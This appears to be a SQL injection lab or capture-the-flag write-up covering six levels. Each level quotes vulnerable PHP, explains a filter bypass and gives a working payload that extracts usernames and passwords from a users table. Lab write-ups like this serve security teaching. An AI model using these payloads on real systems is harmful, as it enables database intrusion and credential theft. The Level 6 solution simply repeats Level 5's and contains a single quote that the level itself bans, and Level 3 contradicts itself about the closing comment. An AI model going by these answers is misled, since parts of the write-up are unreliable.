http://34.66.235.224:12000/

###############################################################################
Level 1
###############################################################################
Explanation:-------------------------------------------------------------------
  This is classic SQL injection where you can directly manipulate the query
  through the text entry field. Vulnerable code:

    if (isset($_POST['session_id'])) {
        $query = "SELECT * FROM secrets WHERE session_id = '
            " . $_POST['session_id'] . "'";
        $result = $conn->query($query);
    }

  We want results from more than just session_id = <fixed value>, so we just
  break out of that query with a ' and OR with something that gets more results.

Solution:----------------------------------------------------------------------
  ' OR session_id LIKE '%%

###############################################################################
Level 2
###############################################################################
Explanation:-------------------------------------------------------------------
  This time they say they used prepared statements. This is true for the
  password part, but we can control username:
    
    $query = "SELECT username FROM users where username = '" . $_POST['username
      '] . "' and password = ?";
  
  For this example, it is important to know that and has higher precedence
  than or, so we can use this fact to manipulate results and return the
  administrator. When we do this, query will actually return the admininstrtor
  row/info and we will login as the admin.

    $query = $conn->prepare($query); <----- CRAFT MALICIOUS SQL TO PASS THIS
                                              TRIAL AND ERROR

    // If query is invalid
    if ($query === false) {
        $error = true;
        $error_msg = "<strong>Error!</strong> Invalid SQL query";    
    } else { 

    // Bind password param
    $query->bind_param("s", $_POST['password']);
    $query->execute();
    $query->bind_result($user); <----- AND/OR PRECEDENCE RULES ALLOW
                                        US TO BIND ADMINISTRATOR TO USER
    $query->fetch();

        // Check if a valid user has been found
        if ($user != NULL) { `
            session_start();
            $_SESSION['is_logged_in'] = true;
            $_SESSION['username'] = $user;
        } else {
            $error = true;
            $error_msg = "<strong>Wrong!</strong> Username/Password is invalid.";
        }
    }
  
Solution:----------------------------------------------------------------------
  administrator' OR '1

###############################################################################
Level 3
##############################################################################
Explanation:-------------------------------------------------------------------
  The search engine tries to filter words, but we can get around this because we
  know how they are filtering:

    $_GET['q'] = preg_replace('/' . $banned . '/i', '', $_GET['q']);

  This is just commenting out the banned parts. So lets put the banned words 
  (union and select) inside themselves. Union becomes UNunionION and select
  becomes SEselectLECT. Now we can use these banned words into the query:

    SELECT * FROM search_engine WHERE title LIKE '%" . $_GET['q'].  "%' OR 
      description LIKE '%" . $_GET['q'] .  "%' OR link LIKE '%" . $_GET['q'] . 
      "%';

  We can abuse this query like this to get the table names:

    greatest%' UNUNIONION (SESELECTLECT TABLE_NAME,TABLE_SCHEMA,3 FROM 
     information_schema.tables);-- %';

  This query reveals a useful table. The users table might have good info in it.
  With a little intelligent guessing of what the flag might be (username
  password) we ca can grab the fields and get the flag:

    greatest%' UNUNIONION (SESELECTLECT users.username, users.password,3 FROM 
      users);#

  Note that we finish with '#' which in mySQL comments out the entire line.

Solution:----------------------------------------------------------------------
  greatest%' UNunionION (SEselectLECT users.username, users.password,3 FROM 
    users);-- %';

###############################################################################
Level 4
##############################################################################
Explanation:-------------------------------------------------------------------
  They tried to protect against us by adding more filters rather than
  commenting out malicious sql keywords:

    // Remove all banned characters
    foreach ($filter as $banned) {
        if (strpos($_GET['q'], $banned) !== false) die("Hacker detected"); 
        if (strpos($_GET['q'], strtolower($banned)) !== false) die("Hacker detected"); 
    } 
  
  These checks are not robust. The first one checks the raw string to see if
  it equals the banned words:

     $filter = array('UNION', 'SELECT');

  The second checks to see if where are using lowercase versions. This is bad
  though because we can use mixed case to bypass these and inject SQL (using
  UniON and SElect).

Solution:----------------------------------------------------------------------
  greatest%' UniON (SElect users.username, users.password,3 FROM  users);# 

###############################################################################
Level 5
##############################################################################
Explanation:-------------------------------------------------------------------
  In this level, they tried to ban spaces in all queries:

    if (isset($_GET['q'])) {
        // Ban space character
        if (strpos($_GET['q'], " ") !== false) die("Hacker detected"); 
    }

  SQL allows paranthetical grouping, so whenever a SQL command occurs, we
  can replace the space with a parenthessis. Where there isn't a command
  we can use block comments. And finally for the finally comment everthing
  after our importnat query with #.
Solution:----------------------------------------------------------------------
    %'/**/UNION(SELECT(users.username),(users.password),(3)FROM(users));#

###############################################################################
Level 6
##############################################################################
Explanation:-------------------------------------------------------------------
  In this level, they tried to ban double and single quotes:

    if (isset($_GET['q'])) {
      // Ban space character
      if (strpos($_GET['q'], "'") !== false) die("Hacker detected"); 
      if (strpos($_GET['q'], '"') !== false) die("Hacker detected"); 
    }

Solution:----------------------------------------------------------------------
    %'/**/UNION(SELECT(users.username),(users.password),(3)FROM(users));#
